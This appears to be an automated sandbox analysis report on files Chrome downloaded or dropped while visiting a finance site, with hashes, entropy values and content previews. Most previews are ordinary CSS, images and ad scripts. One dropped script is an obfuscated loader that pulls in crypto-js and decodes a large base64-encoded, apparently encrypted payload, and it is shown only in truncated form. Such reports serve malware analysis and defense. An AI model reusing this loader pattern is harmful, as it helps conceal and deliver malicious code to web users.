                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:section.yf-7o1tnw.yf-7o1tnw{height:19.5rem;display:flex;flex-direction:column;justify-content:space-between;position:relative}section.yf-7o1tnw .error.yf-7o1tnw{display:flex;justify-content:center;align-items:center;height:100%}.heatMap-container.yf-7o1tnw.yf-7o1tnw{--font-size:var(--font-xs);--padding-scalar:1.5;--text-offset-multiplier:1.25;--x-padding:calc(var(--font-size) / var(--padding-scalar));--y-padding:calc(calc(var(--font-size) * var(--padding-scalar)) - var(--font-size));height:100%;display:block;width:100%;position:relative;overflow:hidden;border-radius:var(--border-radius-s);line-height:1;cursor:pointer}.rect-container.yf-7o1tnw.yf-7o1tnw{position:absolute;outline:1px solid var(--white);left:var(--left-percent);top:var(--top-percent);width:var(--width-percent);height:var(--height-percent);padding:var(--y-padding) var(--x-padding);color:var(--text1);container-type:inline-size;background-color:var(--color)}.rect-container.yf-7o1tnw.yf-7o1tnw:hover{background-color:var(--hov
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):685
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.5735437116465585
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lpSgtk18Q3s7hbC4tQw5TNdztLFzJjIif4G3QWRORS9TvAMaoREKVwobqJDq:wt88qmFC4fdtM+XERShAMaodKVpNK8c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B9913F5599FAAB08D2ADDF87011C61E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9AE6E6A8CA0E50E02A991D032D9B9A461079F95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:68BA1605B3A54D7F827C22CC7252F01C6BF9412CFA6573BE2C91FCD4B9E908CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7BAEA45F411FC30232BD93D04B8CF34414D333096EC669558EE6DD4A4A725785786F488B387E6C38654BA4FD3AECFDA5526DE2D949851796582C75214A42150F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....tIDATx^.=N.@.F..ks...., D..A....$D.5.k.."..#a%.....w.Oz.....T..lm......,_.X.e}rp(...6.-...O.hpM~.>:..X...`#].....c.}...c.}..Kb...`x*r./........*.A.....r.+..-.{m9_#,.!...r.ZX.m.<.-..........1...h....vd.%...amma.........u.r.%<..+........0G......_....,m./`....aV....M...Z.2{|.d.pT...ZJ`VH.[.sB.d........6T_..f..~{...|T.KU]..`...a./G..g]U]..f5..D..H`.M.......C..9_U. .Y..<.c.Q...]..9t....J......f...E......c..Vu..... .Y.\..*Z..fi.2..r.>K..9...lrm.>,..YMr.%<......o..u..&9w...U.]21......v~..`A.....9kaa_..8u9...IU.e..R.s9....<^04.9......W...*.V...".../.Z...l.m.O'..bdc...9a.QPiTY..-.....9.cd.........3.........IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3412), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0908215241003845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:YozhSx5M2PjYJakqOPyGbmq1Tk0GGbLq12k0yXD0THZHL2yVLT4hk14yIJZFOtkK:3hqjg8q1Tr9q12ryw1L2UPq1ktkNCYc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:956DABF4D28930BC42D934995B814D6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D461E2FAB9B3E6F89561FEB5C2A5CBBB26198951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CA9998A600267DC2431ABC077F8CF7A5476A46EE1E82D0C6F12BB17E512C3FE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A98F3C8201E544DB161FA89E8A434B35B179F7D33446247B13EA08B43A7E79D44025524AEFDE0215827B2B2B95F8AC349712DCA00AA3073DDF2C4EE11B9F710
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-text-1.2.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-text"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1424512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.415879071566955
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:anabJ5mwCtCj8vxdTVmfkLPh2178I/Uv2uI4UPxhsWmgDlAtnlvn4xFgrFf5o9dx:PGwCCIvbTUgPh21Ku
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:70BF5DB8AF5C004AF377C5CF24D8049B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BB7C926415868507B0956F8E3604B60FD788C1D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BDE20EEC4C122E877FEDBDF5614D53C65A5F28C252EB5C4CE1F2B6DC03F59336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4B515ABC517E5CDC0373EAA55640793F5A4F8E8C91DD95ACBA67AC50A42878A3476C7FCD02D01044BF8EEE64F17BAF8760599837CF59708286B21C30EBA10553
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/libtrc/yahooweb-network/loader.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}});else{var e=function(e){for(var t=window.document,n=r(t);n;)n=r(t=n.ownerDocument);return t}(),t=[],n=null,i=null;a.prototype.THROTTLE_TIMEOUT=100,a.prototype.POLL_INTERVAL=null,a.prototype.USE_MUTATION_OBSERVER=!0,a._setupCrossOriginUpdater=function(){return n||(n=function(e,n){i=e&&n?u(e,n):{top:0,bottom:0,left:0,right:0,width:0,height:0},t.forEach((function(e){e._checkForIntersections()}))}),n},a._resetCrossOriginUpdater=function(){n=null,i=null},a.prototype.observe=function(e){if(!this._observationTargets.some((function(t){return t.element==e}))){if(!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):39
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1772155278654886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:BVCHYKXbFnCJ:BMHn9CJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A82BCE0734BE83B474EAF1F1ADA8139C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F11AD97BFFC08D1B81945FCE0B2AA6F12F278FC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:85C9F78822701AD5F3A94497491296DF5D68985A4E1313CABF64A734ABD315AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F72EFF32EEACE39A8341966C16308EC941829F46DDAA955ED2AD0C2FD94F122B97CACF86FB99B1CF7F64C89D405CCB408DB1474EEB70EC41CAEC96905AD7BBD3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.rV6zwFgL.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s=!0,o=!1;export{s as b,o as d};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.792343790108531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qvRS+vfqqgdzZgqnstf5BVcedxDtBwsO23crBZrFRDwE5kIuhcYsj:qDhgdz1stxbNxDkbPDwEchAj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:856BFDB63DC0D6FAD6B92FC6A29719E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FED2E3409CE1BBBFB37F6DA4ABEECC30CEFC021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEBE29898B8B7DE5C9E47DAAB474152BE8095E3AB42D768B84B085C5A12B95C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A61C0A108D63C89AE62A2B03108480B5C08BDA0E80049089A2A84CD7973BD9E94DCD2902E166B92E1D7AD5B7356357C9B181CB1B6051DD25913E82D2420154F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiql{l...................................................................d......................................................................................................................................................................................................./00......455566.......122.........-........233......|}}...011.....................{|}......788...$%%.........|}~'((................//344+,,.........z{|)**"##~..}~.*++677................................................=>>...!!!......#$$]^^&''CDDEFF...................SUU......lmn...........KLL...wxy...tvv...xyz.......................dee...............Z\\...fhh.................556...nppikk...ABB'''.........QRS`bbGII...?AA###......WYY............LMN:;;......NNN......VWXqss...bcc......a...[tRNS.......................)....^.b..a....w.....(A?..k...,....mm.......x(w...].....k.].........1....IDATX.Ww\.g....w.Q.@..n.W[E....?.1.%..."Y..i .e..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.970748510171889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:K8+7bIZMMxQR8x3xdHpzoxBwY0yv5Usz3l5c1dCwOjDuI+eIx:wxGQSVGxj0G5BPWz2uI7i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04612442A87A5AF3257ACCBE6C7F3EE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FDA55607C94B2A885EB2FBDEB28BA2A81F562D55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C29D1FFDFE40DEF8E0E1F4375A6980B2CDABA0185D92B3BBE8E7EF8904EBA1C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9459CC9A8945E948DF84615A75A40EDE259E4E7955A93D5ACCE19B8ED20E2A33CDE9CD1CAF0987C32D38E6C3BBCCCAD96BD20243894AE45125A8BC7A8AB12937
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview: var SFSbAzajUSZZBnny = document.createElement("script");..SFSbAzajUSZZBnny.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(SFSbAzajUSZZBnny);..SFSbAzajUSZZBnny.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiY05sZ203clBYeWJYVU1UWlwvOUxoM09sS1wvaXRMVFQ1NE5kVHNSNnJjeEpGSERUZzdtZENzT3JjZjlpUndoNUJEMXYwdUU0WFJiTGt3YzVYT3lxOG11MVpqdnVYUUg4TWxoc2J5KytHTUp1ZTRMYWtxb2xLZE9WbjRHVTF6Wld3Z253QmJrQ1pNcFwvXC9paXJzeWJoaDRUVThBRGUxMzgzRk4wa0crV00wOFduN1dEU244OTdZXC9rbXpsWDlvUFQ1OEcxSTduOHRRMlgxeklnWUsxOElZaG5cL2MzYTgwV2JROVo5TFJYWldNU1VHSWgzYlhwOHpFdk9JYmY4eXBtSDF3NkpqZnM5WUpiK1NIYk5Ca0QxbFFycVlHSTFCK05kNXRDQ0QxOFRaOTVsSUE5b2h1UDkybHpTZGRlbkZyYldKcHc2c2xKSmFLMTB0SG5hdHZTMlFWbDFra3YyVitjUnNYeDJLb1ZVcWF0YTRjZ0JJMmpkYW5NUGp1ZWY4dzhVUFcydWdBOUI3OWdDQ1AwaFwvSjFydHVVY2lvZlYxMllFeUhqcFF5Um9Samw5TXBqUTByQW5kK3BudmdcL1NudFI0M21KcWx2VkJjTGtObkNRVkR0c1ltTWlKOERYUE5xXC9GbkVwV09HUTFFYVNkRWhzUzVGM0JkblVyTnRcL1BKUm9NOEtLVWFiTktlQW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537072960&val=16akzw1q0gj48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7406)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7407
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.471289026670665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:tWqYjsLguzdXTY0uVzgCdr33o10ywANjDfbTG/nOtocaH8lQYhG:mjsLeVUCdr3n3cJ/U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AB1E01F39A0FD2D1F0E049CF556ED9E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B3F0D27115ED382D2106451B2BC90A28309CF173
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B45750621A2D12DA4D3A0A68862DC94DBFCC09B80FB2A4933620BD3A78DD9F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:58CCC7F78AF2BB52F064D7824119B57F9E9F20BE15351A2E9232CFEDD970FC39240CC7E7097BB83B58DD9B74FE14483CE5B4C7D9B91D85A27E41A4DF900DC320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ce,e as z,b as x,d as E,f as G,j as p,i as F,q as o,_ as T,U as R,k as ne,l as O,a3 as $,G as fe,I as he,P as de}from"./scheduler.Dr9AAxFe.js";import{S as me,i as be,c as _e,b as Ce,m as we,t as ge,a as Se,d as ye}from"./index.DCSmZEjO.js";import{t as B,g as D}from"./commonUtil.CI22_Irn.js";import{I as qe}from"./Icon.BSWt_jx8.js";import{g as ke}from"./43.CtYdpA_T.js";import Ae from"./search.D1DBxgNd.js";function ee(a){let t;return{c(){t=z("div"),this.h()},l(n){t=E(n,"DIV",{class:!0}),G(t).forEach(F),this.h()},h(){o(t,"class","finsrch-rslt finsrch-custom-rst finsrch-show-recomlst yf-cs8l6v"),R(t,"finsrch-show-ftr",a[11])},m(n,f){ne(n,t,f)},p(n,f){f[0]&2048&&R(t,"finsrch-show-ftr",n[11])},d(n){n&&F(t)}}}function Te(a){let t,n,f,y,i,m,q,w,_,b,r,g,k;f=new qe({props:{size:a[9],icon:Ae,type:a[10],className:"tw-absolute !tw-inline-flex tw-top-3 tw-left-3"}});let u=typeof a[12]!="function"&&ee(a);return{c(){t=z("div"),n=z("form"),_e(f.$$.fragment),y=x(),i=z("input"),q=x(),u&&u.c(),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1916)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):178613
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503527684900699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:FvS/T+v1JYT7qSaR8dIs6gmLKSdk5to307E:FokgmLKAk5e0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:72E3755EF5E522FB5C1B8D99FD7B4266
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E70185E71BE208E2996BCC131571C65C1C7C3290
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6EAD6613354E36353E48B2A0BDED4BCB693D0B5934691E89B14DEB8DC453B6ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:860C79090623C2423F2EEC815FEDE7AFF241831D29FF51A362C41603BA084CAAE4FEF6AAA1455333CC4D103BB01D56B4149C1A10FD1DF15FF6AC1F82F6A810CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ha=ca(this),ia=function(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.ia("Symbol",function(a){if(a)return a;var b=function(f,g){this.g=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (63150)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):104927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.338560238864084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:/wQndm/xVe8DyLfcqYN8SFSJ7DAggrOTUEH:/HdGhGLKFGp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5523D8ECB59B7F14257B1AA42707DB4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:43C6010C5E466A4374D00EED552C1BA7136FBE03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5845701DF4B64A0275FB78EF3572286171308D02FB263340C4F59646C407A8C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:82FEE8CE2305878E03954D2273807BB9A4093E93D54127FA20F0ED51447A78B286BE434CE3C5DF6E20E38AFAAC5BB387B68E75ED803B4882BE45528027D97949
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.assertive = {. entityId: "wnsrvBJmEPrTfrnFX",. analytics: {. sampleRate: 0.05,. integrations: {. ivt: false,. },. logUnfilled: true,. useHistoryChangeTrigger: true,. override: {. normalizeSlotId: function (slotId) {. return slotId.replace(. /-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/,. "". );. },. },. },. floor: {. enabled: true,. addToHashKey: false,. currency: "USD",. optimizeThreshold: 'm_0.2',. optimizePrebidThreshold: '1st_1.4',. exploreRate: 0.05,. limit: {. percentage: 0.95,. },. prebid: true,. aps: false,. priceBuckets: [. { min: 0, max: 2, increment: 0.01 },. { min: 2, max: 3, increment: 0.05 },. ],. },.};..(function() {. try {. var domain = window.location.hostname.replace('www.', '');. if (domain === 'engadget.com') {. assertive.analytics.sampleRate = 1;. var ra = Math.random();. var perce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7907), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.134832253452516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3NiauurulAaIgvP+85ntzZSNLcVNHrjOO:3yuqlPI8Z3NsYVhrjr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:85070595D47A7CC86AF31833110DC18A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:13564B6787EE765D841B2B6D1C4A6E73A2553AF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:79D954B80C39513A18EE1E0143D931BA9222B4C4794438F7BAD23F9E0380CDC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B89211958F1EC914F3C31363EC7A60EFF460A86EAEF594522FD11A75712E0D0B05918C1D3FC720DD5D970399CD59C45E2F0069C5A9AE8014253661A2CEDABD38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-template"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.088614430389869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
